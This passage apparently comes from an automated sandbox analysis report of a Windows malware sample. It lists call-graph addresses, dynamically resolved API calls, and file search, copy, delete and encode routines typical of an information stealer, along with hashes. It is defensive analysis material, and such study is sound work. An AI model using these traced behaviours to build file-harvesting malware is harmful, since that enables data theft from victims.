4050d7 83063->83064 83065 416fb0 4 API calls 83064->83065 83066 4050f8 83065->83066 83067 416ea0 lstrcpy 83066->83067 83068 405101 83067->83068 83069 416fb0 4 API calls 83068->83069 83164->82899 83165->82927 83166->82927 83167->82933 83168->82936 83170 4155ad CryptBinaryToStringA 83169->83170 83171 4155a9 83169->83171 83170->83171 83172 4155ce GetProcessHeap RtlAllocateHeap 83170->83172 83171->83008 83172->83171 83173 4155f4 codecvt 83172->83173 83174 415605 CryptBinaryToStringA 83173->83174 83174->83171 83182->82501 83422 409260 83183->83422 83185 4092c1 83185->82508 83348 416d40 lstrcpy 83347->83348 83349 40eaa6 83348->83349 83350 4154e0 2 API calls 83349->83350 83351 40eabb 83350->83351 83352 416f20 3 API calls 83351->83352 83353 40eacb 83352->83353 83354 416ea0 lstrcpy 83353->83354 83355 40ead4 83354->83355 83427 414ff0 malloc 83422->83427 83424 40926d 83428 406990 83424->83428 83426 40928c codecvt 83426->83185 83427->83424 83431 406730 83428->83431 83432 406753 83431->83432 83448 406749 83431->83448 83449 405f20 83432->83449 83436 4067ae 83436->83448 83461 4063a0 83436->83461 83440 40683a 83441 4068d6 VirtualFree 83440->83441 83443 4068e7 83440->83443 83440->83448 83441->83443 83442 406931 83442->83448 83443->83442 83445 406916 FreeLibrary 83443->83445 83446 406928 83443->83446 83445->83443 83448->83426 83451 405f32 83449->83451 83450 405f39 83450->83448 83455 406050 83450->83455 83451->83450 83452 405fbe 83451->83452 83478 415110 GetProcessHeap HeapAlloc 83452->83478 83454 405fe0 83454->83450 83458 40607f VirtualAlloc 83455->83458 83457 406120 83459 406133 VirtualAlloc 83457->83459 83460 40612c 83457->83460 83458->83457 83458->83460 83459->83460 83460->83436 83462 4063c5 83461->83462 83463 4063b9 83461->83463 83462->83448 83472 4065d0 83462->83472 83463->83462 83464 4063f9 LoadLibraryA 83463->83464 83465 406418 83464->83465 83466 406422 83464->83466 83465->83462 83469 4064cc 83466->83469 83479 415110 GetProcessHeap HeapAlloc 83466->83479 83468 406594 GetProcAddress 83468->83465 83468->83469 83469->83465 83469->83468 83470 40647b 83470->83465 83480 4150f0 GetProcessHeap HeapFree 83470->83480 83474 4065eb 83472->83474 83473 406699 83473->83440 83474->83473 83475 406670 VirtualProtect 83474->83475 83475->83473 83475->83474 83478->83454 83479->83470 83480->83469 84578 6ba535a0 84579 6ba535c4 InitializeCriticalSectionAndSpinCount getenv 84578->84579 84594 6ba53846 __aulldiv 84578->84594 84581 6ba535f3 __aulldiv 84579->84581 84582 6ba538fc strcmp 84579->84582 84585 6ba535f8 QueryPerformanceFrequency 84581->84585 84586 6ba53622 _strnicmp 84581->84586 84587 6ba53944 _strnicmp 84581->84587 84589 6ba53664 GetSystemTimeAdjustment 84581->84589 84590 6ba5395d 84581->84590 84592 6ba5375c 84581->84592 84582->84581 84584 6ba53912 strcmp 84582->84584 84583 6ba538f4 84584->84581 84585->84581 84586->84581 84586->84587 84587->84581 84587->84590 84588 6ba5376a QueryPerformanceCounter EnterCriticalSection 84591 6ba537b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 84588->84591 84588->84592 84589->84581 84591->84592 84593 6ba537fc LeaveCriticalSection 84591->84593 84592->84588 84592->84591 84592->84593 84592->84594 84593->84592 84593->84594 84595 6ba8b320 5 API calls ___raise_securityfailure 84594->84595 84595->84583 84596 6ba53060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 84601 6ba8ab2a 84596->84601 84600 6ba530db 84605 6ba8ae0c _crt_atexit _register_onexit_function 84601->84605 84603 6ba530cd 84604 6ba8b320 5 API calls ___raise_securityfailure 84603->84604 84604->84600 84605->84603 84606 6ba8b8ae 84607 6ba8b8ba ___scrt_is_nonwritable_in_current_image 84606->84607 84608 6ba8b8e3 dllmain_raw 84607->84608 84609 6ba8b8de 84607->84609 84618 6ba8b8c9 84607->84618 84610 6ba8b8fd dllmain_crt_dispatch 84608->84610 84608->84618 84619 6ba6bed0 DisableThreadLibraryCalls LoadLibraryExW 84609->84619 84610->84609 84610->84618 84612 6ba8b91e 84613 6ba8b94a 84612->84613 84620 6ba6bed0 DisableThreadLibraryCalls LoadLibraryExW 84612->84620 84614 6ba8b953 dllmain_crt_dispatch 84613->84614 84613->84618 84615 6ba8b966 dllmain_raw 84614->84615 84614->84618 84615->84618 84617 6ba8b936 dllmain_crt_dispatch dllmain_raw 84617->84613 84619->84612 84620->84617 84621 6ba6c930 GetSystemInfo VirtualAlloc 84622 6ba6c9a3 GetSystemInfo 84621->84622 84623 6ba6c973 84621->84623 84625 6ba6c9b6 84622->84625 84626 6ba6c9d0 84622->84626 84637 6ba8b320 5 API calls ___raise_securityfailure 84623->84637 84625->84626 84628 6ba6c9bd 84625->84628 84626->84623 84629 6ba6c9d8 VirtualAlloc 84626->84629 84627 6ba6c99b 84628->84623 84630 6ba6c9c1 VirtualFree 84628->84630 84631 6ba6c9f0 84629->84631 84632 6ba6c9ec 84629->84632 84630->84623 84638 6ba8cbe8 GetCurrentProcess TerminateProcess 84631->84638 84632->84623 84637->84627 84639 6ba8b9c0 84640 6ba8b9c9 84639->84640 84641 6ba8b9ce dllmain_dispatch 84639->84641 84643 6ba8bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 84640->84643 84643->84641 84644 6ba8b694 84645 6ba8b6a0 ___scrt_is_nonwritable_in_current_image 84644->84645 84674 6ba8af2a 84645->84674 84647 6ba8b6a7 84648 6ba8b6d1 84647->84648 84649 6ba8b796 84647->84649 84667 6ba8b6ac ___scrt_is_nonwritable_in_current_image 84647->84667 84678 6ba8b064 84648->84678 84691 6ba8b1f7 IsProcessorFeaturePresent 84649->84691 84652 6ba8b6e0 __RTC_Initialize 84652->84667 84681 6ba8bf89 InitializeSListHead 84652->84681 84654 6ba8b7b3 ___scrt_uninitialize_crt __RTC_Initialize 84655 6ba8b6ee ___scrt_initialize_default_local_stdio_options 84657 6ba8b6f3 _initterm_e 84655->84657 84656 6ba8b79d ___scrt_is_nonwritable_in_current_image 84656->84654 84658 6ba8b828 84656->84658 84659 6ba8b7d2 84656->84659 84661 6ba8b708 84657->84661 84657->84667 84660 6ba8b1f7 ___scrt_fastfail 6 API calls 84658->84660 84695 6ba8b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 84659->84695 84664 6ba8b82f 84660->84664 84682 6ba8b072 84661->84682 84663 6ba8b7d7 84696 6ba8bf95 __std_type_info_destroy_list 84663->84696 84670 6ba8b83b 84664->84670 84671 6ba8b86e dllmain_crt_process_detach 84664->84671 84668 6ba8b70d 84668->84667 84669 6ba8b711 _initterm 84668->84669 84669->84667 84672 6ba8b860 dllmain_crt_process_attach 84670->84672 84673 6ba8b840 84670->84673 84671->84673 84672->84673 84675 6ba8af33 84674->84675 84697 6ba8b341 IsProcessorFeaturePresent 84675->84697 84677 6ba8af3f ___scrt_uninitialize_crt 84677->84647 84698 6ba8af8b 84678->84698 84680 6ba8b06b 84680->84652 84681->84655 84683 6ba8b077 ___scrt_release_startup_lock 84682->84683 84684 6ba8b07b 84683->84684 84685 6ba8b082 84683->84685 84708 6ba8b341 IsProcessorFeaturePresent 84684->84708 84688 6ba8b087 _configure_narrow_argv 84685->84688 84687 6ba8b080 84687->84668 84689 6ba8b092 84688->84689 84690 6ba8b095 _initialize_narrow_environment 84688->84690 84689->84668 84690->84687 84692 6ba8b20c ___scrt_fastfail 84691->84692 84693 6ba8b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84692->84693 84694 6ba8b302 ___scrt_fastfail 84693->84694 84694->84656 84695->84663 84696->84654 84697->84677 84699 6ba8af9a 84698->84699 84700 6ba8af9e 84698->84700 84699->84680 84701 6ba8b028 84700->84701 84703 6ba8afab ___scrt_release_startup_lock 84700->84703 84702 6ba8b1f7 ___scrt_fastfail 6 API calls 84701->84702 84704 6ba8b02f 84702->84704 84705 6ba8afb8 _initialize_onexit_table 84703->84705 84706 6ba8afd6 84703->84706 84705->84706 84707 6ba8afc7 _initialize_onexit_table 84705->84707 84706->84680 84707->84706 84708->84687

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04054178), ref: 0041625D
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04054478), ref: 00416275
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040705A0), ref: 0041628E
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04070540), ref: 004162A6
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040705D0), ref: 004162BE
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04070570), ref: 004162D7
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,0406F8B0), ref: 004162EF
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04070510), ref: 00416307
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040761E0), ref: 00416320
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040760A8), ref: 00416338
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04076288), ref: 00416350
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040542D8), ref: 00416369
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04054438), ref: 00416381
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040543F8), ref: 00416399
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04054458), ref: 004163B2
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04076138), ref: 004163CA
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040760D8), ref: 004163E2
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,0406F928), ref: 004163FB
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04054298), ref: 00416413
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04076258), ref: 0041642B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04076348), ref: 00416444
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040761C8), ref: 0041645C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04076210), ref: 00416474
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04054618), ref: 0041648D
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04076228), ref: 004164A5
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040760F0), ref: 004164BD
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040762D0), ref: 004164D6
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04076108), ref: 004164EE
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04076240), ref: 00416506
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040762E8), ref: 0041651F
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04076270), ref: 00416537
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04076150), ref: 0041654F
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04076318), ref: 00416568
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04072178), ref: 00416580
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04076330), ref: 00416598
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04076060), ref: 004165B1
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04054638), ref: 004165C9
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04076300), ref: 004165E1
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040543D8), ref: 004165FA
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04076168), ref: 00416612
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04076078), ref: 0041662A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,040542F8), ref: 00416643
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,04054498), ref: 0041665B
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(040762A0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(04076090,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(040762B8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(040760C0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(04076120,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(04076180,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(04076198,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(040761B0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75290000,040544B8), ref: 0041670A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75290000,040761F8), ref: 00416722
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75290000,04070918), ref: 0041673A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75290000,040763F0), ref: 00416753
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75290000,040544D8), ref: 0041676B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(734C0000,0406F900), ref: 00416790
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(734C0000,040544F8), ref: 004167A9
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(734C0000,0406F950), ref: 004167C1
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(734C0000,04076360), ref: 004167D9
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(734C0000,040763A8), ref: 004167F2
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(734C0000,04054418), ref: 0041680A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(734C0000,04054318), ref: 00416822
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(734C0000,040763C0), ref: 0041683B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(752C0000,04054558), ref: 0041685C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(752C0000,04054338), ref: 00416874
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(752C0000,04076420), ref: 0041688D
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(752C0000,040763D8), ref: 004168A5
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(752C0000,04054518), ref: 004168BD
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74EC0000,0406F978), ref: 004168E3
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74EC0000,0406FA90), ref: 004168FB
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74EC0000,04076408), ref: 00416913
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74EC0000,04054398), ref: 0041692C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74EC0000,04054538), ref: 00416944
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74EC0000,0406F9A0), ref: 0041695C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,04076378), ref: 00416982
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,04054578), ref: 0041699A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,04070858), ref: 004169B2
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,04076390), ref: 004169CB
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,040764C8), ref: 004169E3
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,04054358), ref: 004169FB
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,04054598), ref: 00416A14
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,040765D0), ref: 00416A2C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,04076750), ref: 00416A44
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75A70000,040545B8), ref: 00416A66
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75A70000,04076468), ref: 00416A7E
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75A70000,040765B8), ref: 00416A96
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75A70000,04076690), ref: 00416AAF
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75A70000,040765A0), ref: 00416AC7
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75450000,040542B8), ref: 00416AE8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75450000,040543B8), ref: 00416B01
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75DA0000,04054378), ref: 00416B22
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75DA0000,04076630), ref: 00416B3A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6F090000,040545D8), ref: 00416B60
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6F090000,040545F8), ref: 00416B78
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6F090000,04077450), ref: 00416B90
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6F090000,04076600), ref: 00416BA9
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6F090000,04077430), ref: 00416BC1
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6F090000,04077150), ref: 00416BD9
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6F090000,04077290), ref: 00416BF2
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6F090000,040773B0), ref: 00416C0A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75AF0000,04076720), ref: 00416C2B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75AF0000,040708F8), ref: 00416C44
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75AF0000,040765E8), ref: 00416C5C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75AF0000,04076738), ref: 00416C74
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75D90000,04077310), ref: 00416C96
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6CB80000,04076480), ref: 00416CB7
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6CB80000,040771B0), ref: 00416CCF
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6CB80000,04076618), ref: 00416CE8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6CB80000,04076588), ref: 00416D00
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2238633743-0
                                                                                                                                                                                                                                      • Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                                      • Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00411669
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 004116D2
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
                                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
                                                                                                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 00411995
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                                                                                                                                                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                                                                                                                                                                                      • API String ID: 1125553467-2524465048
                                                                                                                                                                                                                                      • Opcode ID: 4a1a44a5959dc9b82b61be8d89ed438f48614dbf2bf761535620a69525459399
                                                                                                                                                                                                                                      • Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a1a44a5959dc9b82b61be8d89ed438f48614dbf2bf761535620a69525459399
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 880 40b610-40b6a2 call 416d40 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 call 416d40 * 2 call 4170d0 FindFirstFileA 899 40b6e1-40b6f5 StrCmpCA 880->899 900 40b6a4-40b6dc call 416e00 * 6 call 413220 880->900 901 40b6f7-40b70b StrCmpCA 899->901 902 40b70d 899->902 945 40bf8b-40bf8e 900->945 901->902 904 40b712-40b78b call 416e20 call 416f20 call 416fb0 * 2 call 416ea0 call 416e00 * 3 901->904 905 40bf30-40bf43 FindNextFileA 902->905 950 40b791-40b817 call 416fb0 * 4 call 416ea0 call 416e00 * 4 904->950 951 40b81c-40b89d call 416fb0 * 4 call 416ea0 call 416e00 * 4 904->951 905->899 909 40bf49-40bf56 FindClose call 416e00 905->909 915 40bf5b-40bf86 call 416e00 * 5 call 413220 909->915 915->945 987 40b8a2-40b8b8 call 4170d0 StrCmpCA 950->987 951->987 990 40ba79-40ba8f StrCmpCA 987->990 991 40b8be-40b8d2 StrCmpCA 987->991 992 40ba91-40bad1 call 401500 call 416da0 * 3 call 409b30 990->992 993 40bade-40baf4 StrCmpCA 990->993 991->990 994 40b8d8-40b9f2 call 416d40 call 415260 call 416fb0 call 416f20 call 416ea0 call 416e00 * 3 call 4170d0 * 2 CopyFileA call 416d40 call 416fb0 * 2 call 416ea0 call 416e00 * 2 call 416da0 call 4093a0 991->994 1057 40bad6-40bad9 992->1057 997 40bb66-40bb7e call 416da0 call 415490 993->997 998 40baf6-40bb0d call 4170d0 StrCmpCA 993->998 1147 40b9f4-40ba36 call 416da0 call 401500 call 404dc0 call 416e00 994->1147 1148 40ba3b-40ba74 call 4170d0 DeleteFileA call 417040 call 4170d0 call 416e00 * 2 994->1148 1017 40bc51-40bc66 StrCmpCA 997->1017 1018 40bb84-40bb8b 997->1018 1007 40bb61 998->1007 1008 40bb0f-40bb5b call 401500 call 416da0 * 3 call 40a030 998->1008 1015 40beb9-40bec2 1007->1015 1008->1007 1021 40bf20-40bf2b call 417040 * 2 1015->1021 1022 40bec4-40bf15 call 401500 call 416da0 * 2 call 416d40 call 40b610 1015->1022 1031 40be50-40be65 StrCmpCA 1017->1031 1032 40bc6c-40bdcf call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 4170d0 * 2 CopyFileA call 401500 call 416da0 * 3 call 40a6e0 call 401500 call 416da0 * 3 call 40ace0 call 4170d0 StrCmpCA 1017->1032 1025 40bbf7-40bc41 call 401500 call 416da0 call 416d40 call 416da0 call 40a030 1018->1025 1026 40bb8d-40bb94 1018->1026 1021->905 1095 40bf1a 1022->1095 1103 40bc46 1025->1103 1035 40bbf5 1026->1035 1036 40bb96-40bbef call 401500 call 416da0 call 416d40 call 416da0 call 40a030 1026->1036 1031->1015 1041 40be67-40beae call 401500 call 416da0 * 3 call 40aa20 1031->1041 1179 40bdd1-40be1b call 401500 call 416da0 * 3 call 40b250 1032->1179 1180 40be26-40be3e call 4170d0 DeleteFileA call 417040 1032->1180 1052 40bc4c 1035->1052 1036->1035 1106 40beb3 1041->1106 1052->1015 1057->1015 1095->1021 1103->1052 1106->1015 1147->1148 1148->990 1196 40be20 1179->1196 1187 40be43-40be4e call 416e00 1180->1187 1187->1015 1196->1180
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
                                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
                                                                                                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 0040BF4D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
